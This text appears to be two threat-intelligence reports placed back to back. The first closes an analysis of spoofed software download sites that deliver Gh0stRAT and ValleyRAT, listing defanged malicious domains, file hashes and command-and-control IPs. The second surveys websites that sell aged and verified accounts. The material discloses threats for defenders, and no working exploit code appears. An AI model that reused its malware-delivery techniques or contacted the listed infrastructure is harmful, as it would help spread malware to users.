Notably, both clusters 1 and 2 were observed delivering identical Gh0stRAT and ValleyRAT binaries. Cluster 2 operates multiple varieties of spoofed website code, which often appear to utilize highly obfuscated JavaScript to collect user information and potentially selectively render functional malware delivery links. The majority of the websites were observed delivering 0-byte files, and less commonly copies of legitimate install files hosted locally on the site. A subset of the spoofed download sites were observed hosting identical Gh0stRat and ValleyRAT binaries as cluster 1 including “googleochrome[.]com” discussed in more depth later.

The 0-byte files are suspected to be placeholders, with real malware being delivered through obfuscated JavaScript dynamically loaded when certain user conditions are identified such as Geo IP location, language settings and browser type.

Earlier versions of the spoofed download sites appeared to typically host malware locally on the same spoofed website server. Later spoofed download sites began hosting files on other servers, commonly using other actor owned domains and often with subdomains “cnd.” or “down.”

More recent spoofed download sites continue to separate the spoofed websites from the hosted files by using Amazon’s CloudFront content delivery network such as the following: 

• Spoofed download sites for Lets VPN: “letscavpn[.]com” & “letsekvpn[.]com”
• Download URL: “https[:]//d2g2a3g6fn6aza.cloudfront[.]net/android/letsvpn-latest[.]apk”

Using CDNs such as CloudFront as a delivery network can obscure the true origin location of the malware and make detection and mitigation efforts more difficult. 

C2 Infrastructure

Identified multiple samples of suspected Gh0stRat backdoors being hosted from the spoofed download websites as having Command & Control (C2) to IP addresses. Multiple IP addresses shared the same server scan hash allowing a potential pivot to other IP addresses configured by the actor.

Malware delivery domain “googleochrome[.]com” spoofs as a Chrome browser download site and contains code to load content from a similarly named but different domain: “https[:]//down.googluchrome[.]com”

This initiates a file download for a file named “/Chrome.zip” with a SHA256 hash of “09efbe0c3e69c0f9a578bbbf0d475bd418497717921713779d1aa89dd2be35d6” 

Chrome.zip unzips a file named “Chrome.msi” with a SHA256 hash of “e39e44cb79c5b1918d8139cfbb6d2ada044dbe4b413e86504f10e902072743fd”

Chrome.msi contains a file named “payload”, 522863520bcc368631a2db5016a1af68f60ecb074ddf19c9e7bff9834bb05248

The payload file upon execution calls out to the following IP:

• TCP 154.91.90[.]102:4433
• TCP 154.91.90[.]102:10443

At the time of observed use, the IP hosted a WinRM service with a Shodan.io hash of “%3A897366806”. 145 IPs shared this hash and nearly all are under Tcloudnet, Inc organization. 

Triaging the IPs identified several have a recent history of malicious files communicating with them from similar variants.

Conclusion

A crucial aspect of this investigation lies in recognizing the broader implications of the observed tactics. History has repeatedly demonstrated that techniques initially deployed against one demographic or vertical are often adapted and repurposed to target others. While this campaign appears to currently focus on Chinese-speaking users, the sophisticated methods employed—including obfuscated JavaScript, strategic use of analytics services, and evolving infrastructure for malware delivery and data collection—represent a readily transferable playbook. Therefore, diligent monitoring and analysis of these tactics are not merely relevant to the current situation.

By proactively studying and understanding these techniques now, the cybersecurity community can better prepare for similar threats that may emerge, targeting different demographics and potentially posing a direct risk to a wider range of users in the future. This proactive approach is essential for developing effective defenses and mitigating the impact of future, related campaigns.

IOCs

‍

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/CNMalwareDelivery-Pt2

This report examines the illicit online trade of aged and verified accounts for platforms like social media, email, and Google Ads. These accounts, often obtained through hacking or phishing, are valuable for bypassing security and leveraging established trust. They fuel a range of activities, from grey-area marketing tactics to serious crimes like fraud and disinformation, highlighting a significant security risk and a growing challenge in the digital landscape.

Details

In December, 2024, over 100 newly registered domains were observed hosting websites alleging to sell pre-verified and aged accounts. These additions to the burgeoning illicit online market for aged and verified accounts alleged to sell accounts across a range of platforms including social media, email providers, cloud services, and advertising networks like Google Ads. These underground marketplaces cater to a demand for pre-existing, reputable digital identities, often acquired through illicit means such as data breaches, phishing scams, or account takeovers.

Buyers are drawn to these accounts for a variety of reasons, primarily the ability to bypass security measures and leverage the established trust associated with older or verified profiles. While some may employ these accounts for seemingly innocuous purposes like gaining an edge in social media marketing or accessing region-locked content, a significant portion fuels malicious activities, including spam campaigns, fraud, disinformation dissemination, and even more nefarious operations. 

This investigation will delve into recently configured domains and websites in the ecosystem of these account markets, examining the types of accounts traded and techniques employed to drive traffic to their sites.

Cloud and BHW Accounts

Based on domain registration overlaps, the following 3 domains were likely created by the same actor. The websites advertise the sale of cloud accounts from top providers as well as ads accounts, Apple developer accounts, Google Voice accounts, and payment gateway accounts such as Amazon Pay and Cash App accounts. The site alleges the accounts are pre-verified and customers are granted full access to the accounts.

• IP ISP: Hostinger International Limited
• IP Country: US
• Website Title contains all: buy, account

topcloudacc[.]com
acctrusted[.]com
buybhwaccounts[.]xyz

Domain `topcloudacc[.]com` purports to sell AWS, Cloud, Ads, and other accounts.

Website Title: “Buy AWS Account | Best 32-vCPU & Credit Account - 2025”

Domain `acctrusted[.]com` purports to sell cloud accounts for AWS, Azure, Vultr, DigitalOcean and others for sale. 

Website Title: “Buy AWS Accounts | Best Vcpu & Credit Account For Sale 2024”

Domain `buybhwaccounts[.]xyz` purports to sell AWS, Google Cloud, Oracle, Digital Ocean, Ads Accounts, and BHW accounts.

Website Title: “Buy BHW Accounts - BHW Accounts For Sale - buybhwaccounts[.]xyz”

Domain `isp-rebellion[.]com` purports to sell Apple 2FA Accounts.

Website Title: “Apple 2FA Accounts for Sale”

Social Media Accounts for Sale

Domain `regularpva[.]com` purports to sell a variety of social media, email and dating accounts such as Facebook, Instagram, Gmail, Outlook, Twitter, and Yahoo. 

Website Title: “Buy Social Media Accounts - Social Media Pages for Sale - SecurePVA”

Domain `shiftxchange[.]biz` purports to be a marketplace for buying and selling social media accounts among other alleged service offerings.

Website Title: “Social Media Accounts for Sale”

Domains twitterxarena[.]com and redditarena[.]com both redirect to discordarena[.]com and purport to sell premium aged social media accounts including Discord and Reddit.

Website Title: “Premium Aged Discord Accounts for Sale | Discord Arena”

Domain `redditaccsbuy[.]com` purports to sell aged reddit accounts

Website Title: “Reddit Accounts with Karma for Sale | Buy Verified, Aged Reddit Accounts Instantly | Affordable Reddit Account Marketplace”

Examining One Such Network: Aged Google Ads Accounts for Sale

Over 100 identical websites were created in December, 2024 purporting to sell aged Google Ads accounts and invite codes to illicit marketplaces. For awareness, selling or buying Google Ads accounts is a violation of Google's terms of service. Aged accounts might be perceived as having more authority or being less likely to be flagged for suspicious activity, making them attractive to those trying to game the system. 

Registration Overlaps:

• Registrar: Dynadot LLC
• Name Server: cloudFlare.com
• Server Type: CloudFlare
• ISP IP: CloudFlare Inc.
• Domain Name or Website Title contains: google ads or adwords

During December 2024, 128 domains were identified with nearly identical domain registration details. All domains were configured with nearly identical website content. The websites contain links to illicit marketplaces such as credit card number verification and acquisition services, and illicit Russian markets. The websites also contain multiple links with the other 128 domains such that all 128 domains have websites directing traffic to each other. 

This configuration of interconnected website links is characteristic of search engine optimization (SEO) manipulation techniques. Specifically, in also considering the illicit content of these websites, this activity may be created solely to build backlinks to a main "money site" to manipulate search engine rankings typically referred to as a Private Blog Networks (PBN). PBNs can be a particularly effective SEO manipulation technique as search engines like Google consider backlinks as a signal of authority. The more backlinks, the higher the ranking. PBNs attempt to artificially inflate these rankings to drive traffic to their main sites. As such, search engine providers may penalize these networks and main sites by dropping their search rankings or completely removing them from search results. 

Example Google search query results for Google Ad accounts for sale:

Conclusion

In conclusion, the illicit market for aged and verified accounts across social media, email, and advertising platforms represents a persistent and evolving threat. Resold accounts are often acquired through illegitimate means and through account farming and reselling. Aged and pre-verified accounts provide a foundation for a spectrum of illicit and grey-area activities, ranging from spam campaigns, fraud, obfuscated ownership of hosting malicious resources on cloud providers, to manipulating online discourse. 

This activity underscores the critical need for enhanced security measures and robust verification processes by platform providers. Detecting and mitigating account handoff behaviors, such as suspicious login patterns or unusual activity spikes, is crucial to prevent the reselling and abuse of verified accounts. Furthermore, marketing and sales teams must exercise heightened vigilance when encountering accounts with seemingly high engagement or suspicious activity. Aged or re-verified accounts may appear more legitimate, but their origins should be carefully scrutinized. 

Proactive threat intelligence, increased awareness among users and businesses, and collaborative efforts between platforms, law enforcement, and cybersecurity researchers are essential to combat the acquisition and exploitation of these compromised accounts, which continue to undermine the integrity and trustworthiness of the digital landscape.

Appendix

‍

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/AccountsForSale